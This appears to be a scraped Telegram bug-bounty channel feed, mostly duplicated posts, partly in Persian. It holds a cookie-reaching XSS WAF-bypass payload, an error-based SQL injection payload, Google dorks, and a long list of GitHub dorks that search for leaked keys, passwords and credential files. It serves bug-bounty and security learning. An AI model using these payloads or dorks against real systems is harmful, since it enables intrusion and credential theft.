XSS WAF Bypass using location concatenation:
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#bugbounty #bugbountytips #xss #xssbypass
@Engineer_Computer
Some recent lessons learned:
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving.
Payload example:
' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) #
#bugbountytips #BugBounty
@Engineer_Computer
#رایتاپ جامع و عالی در مورد نحوه ایجاد یک منبع #recon برای باگ بانتی با استفاده از Flask،MongoDB، REST Api و ChatGPT
#PartOne
https://medium.com/@aliraah/creating-a-recon-database-with-flask-mongodb-rest-api-and-chatgpt-part-one-77ec3fd3b914
#PartTwo
https://medium.com/@aliraah/creating-a-recon-database-with-flask-mongodb-rest-api-and-chatgpt-part-two-468405eb3520
#PartThree
https://medium.com/@aliraah/creating-a-recon-database-with-flask-mongodb-rest-api-and-chatgpt-part-three-cee1633de873
#WriteUp
#Recon
#BugBountyTips
@Engineer_Computer
#PartOne
https://medium.com/@aliraah/creating-a-recon-database-with-flask-mongodb-rest-api-and-chatgpt-part-one-77ec3fd3b914
#PartTwo
https://medium.com/@aliraah/creating-a-recon-database-with-flask-mongodb-rest-api-and-chatgpt-part-two-468405eb3520
#PartThree
https://medium.com/@aliraah/creating-a-recon-database-with-flask-mongodb-rest-api-and-chatgpt-part-three-cee1633de873
#WriteUp
#Recon
#BugBountyTips
@Engineer_Computer
Medium
Creating a recon database with Flask, MongoDB, REST Api and ChatGPT — Part One
Hellow world!
👍1
🔖Google Dorks for recon
🔎 Top Google dorks for bugbounty : Link
#bugbounty #bugbountytips
@Engineer_Computer
site:*.domain.*
site:domain.*
site:*.domain.com
site:*.domain.-*.*
🔎 Top Google dorks for bugbounty : Link
#bugbounty #bugbountytips
@Engineer_Computer
🔖Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments, build and deploy repeatable infrastructure focused on offensive and defensive security.
01. The Introduction to Axiom tool
02. Axiom Bug Bounty Tool Core Functionality
03. Managing AXIOM Instances
04. Creating Custom AXIOM Modules
05. Mass Hunting For Misconfigured S3 Buckets (AXIOM)
06. Mass Cross Site Scripting Hunting (AXIOM)
07. Mass Hunting for Leaked Sensitive Documents (AXIOM)
08. Hunting Blind XSS on the Large Scale Part1 — Practical Techniques
09. Hunting Blind XSS on the Large Scale Part2 — Practical Techniques
10. Top 5 Red Flags of Bug Bounty Programs
#bugbountytips #axiom #bugbounty
@Engineer_Computer
01. The Introduction to Axiom tool
02. Axiom Bug Bounty Tool Core Functionality
03. Managing AXIOM Instances
04. Creating Custom AXIOM Modules
05. Mass Hunting For Misconfigured S3 Buckets (AXIOM)
06. Mass Cross Site Scripting Hunting (AXIOM)
07. Mass Hunting for Leaked Sensitive Documents (AXIOM)
08. Hunting Blind XSS on the Large Scale Part1 — Practical Techniques
09. Hunting Blind XSS on the Large Scale Part2 — Practical Techniques
10. Top 5 Red Flags of Bug Bounty Programs
#bugbountytips #axiom #bugbounty
@Engineer_Computer
لینک های آموزشی در حوزه مهندسی معکوس
@Engineer_Computer
https://www.linkedin.com/posts/felipe-carvalho-01a8b1280_pentesting-bugbounty-bugbountytips-activity-7192123403032494080-eIo2?utm_source=share&utm_medium=member_android
@Engineer_Computer
https://www.linkedin.com/posts/felipe-carvalho-01a8b1280_pentesting-bugbounty-bugbountytips-activity-7192123403032494080-eIo2?utm_source=share&utm_medium=member_android
Linkedin
#pentesting #bugbounty #bugbountytips #kalilinux #hacking #hacker #share… | Felipe Carvalho
Reverse Engineering Tools and Study Guide.
SHARE. Don't be selfish, don't think only of yourself
✔ X86 Architecture.
1-https://lnkd.in/eT5knGmh
2-https://lnkd.in/eSA4YZHK
3-https://lnkd.in/eMjWJTzV
4-https://lnkd.in/eHp8GsUW
✔X64 Architecture
1-htt…
SHARE. Don't be selfish, don't think only of yourself
✔ X86 Architecture.
1-https://lnkd.in/eT5knGmh
2-https://lnkd.in/eSA4YZHK
3-https://lnkd.in/eMjWJTzV
4-https://lnkd.in/eHp8GsUW
✔X64 Architecture
1-htt…
JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers and security researchers.
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #bugbountyTools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥🔥Github-Dork🚀🚀🔥🔥
Happy Hunting
🔍 api_key
🔍 app_AWS_SECRET_ACCESS_KEY
🔍 app_secret
🔍 authoriztion
🔍 Ldap
🔍 aws_access_key_id
🔍 secret
🔍 bash_history
🔍 bashrc%20password
🔍 beanstalkd
🔍 client secre
🔍 composer
🔍 config
🔍 credentials
🔍 DB_PASSWORD
🔍 dotfiles
🔍 .env file
🔍 .exs file
🔍 extension:json mongolab.com
🔍 extension:pem%20private
🔍 extension:ppk private
🔍 extension:sql mysql dump
🔍 extension:yaml mongolab.com
🔍 .mlab.com password
🔍 mysql
🔍 npmrc%20_auth
🔍 passwd
🔍 passkey
🔍 rds.amazonaws.com password
🔍 s3cfg
🔍 send_key
🔍 token
🔍 filename:.bash_history
🔍 filename:.bash_profile aws
🔍 filename:.bashrc mailchimp
🔍 filename:CCCam.cfg
🔍 filename:config irc_pass
🔍 filename:config.php dbpasswd
🔍 filename:config.json auths
🔍 filename:config.php pass
🔍 filename:config.php dbpasswd
🔍 filename:connections.xml
🔍 filename:.cshrc
🔍 filename:.git-credentials
🔍 filename:.ftpconfig
🔍 filename:.history
🔍 filename:gitlab-recovery-codes.txt
🔍 filename:.htpasswd
🔍 filename:id_rsa
🔍 filename:.netrc password
🔍 FTP
🔍 filename:wp-config.php
🔍 git-credentials
🔍 github_token
🔍 HEROKU_API_KEY language:json
🔍 HEROKU_API_KEY language:shell
🔍 GITHUB_API_TOKEN language:shell
🔍 oauth
🔍 OTP
🔍 databases password
🔍 [WFClient] Password= extension:ica
🔍 xoxa_Jenkins
🔍 security_credentials
#bugbountytips #GitHub
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Happy Hunting
🔍 api_key
🔍 app_AWS_SECRET_ACCESS_KEY
🔍 app_secret
🔍 authoriztion
🔍 Ldap
🔍 aws_access_key_id
🔍 secret
🔍 bash_history
🔍 bashrc%20password
🔍 beanstalkd
🔍 client secre
🔍 composer
🔍 config
🔍 credentials
🔍 DB_PASSWORD
🔍 dotfiles
🔍 .env file
🔍 .exs file
🔍 extension:json mongolab.com
🔍 extension:pem%20private
🔍 extension:ppk private
🔍 extension:sql mysql dump
🔍 extension:yaml mongolab.com
🔍 .mlab.com password
🔍 mysql
🔍 npmrc%20_auth
🔍 passwd
🔍 passkey
🔍 rds.amazonaws.com password
🔍 s3cfg
🔍 send_key
🔍 token
🔍 filename:.bash_history
🔍 filename:.bash_profile aws
🔍 filename:.bashrc mailchimp
🔍 filename:CCCam.cfg
🔍 filename:config irc_pass
🔍 filename:config.php dbpasswd
🔍 filename:config.json auths
🔍 filename:config.php pass
🔍 filename:config.php dbpasswd
🔍 filename:connections.xml
🔍 filename:.cshrc
🔍 filename:.git-credentials
🔍 filename:.ftpconfig
🔍 filename:.history
🔍 filename:gitlab-recovery-codes.txt
🔍 filename:.htpasswd
🔍 filename:id_rsa
🔍 filename:.netrc password
🔍 FTP
🔍 filename:wp-config.php
🔍 git-credentials
🔍 github_token
🔍 HEROKU_API_KEY language:json
🔍 HEROKU_API_KEY language:shell
🔍 GITHUB_API_TOKEN language:shell
🔍 oauth
🔍 OTP
🔍 databases password
🔍 [WFClient] Password= extension:ica
🔍 xoxa_Jenkins
🔍 security_credentials
#bugbountytips #GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🔥1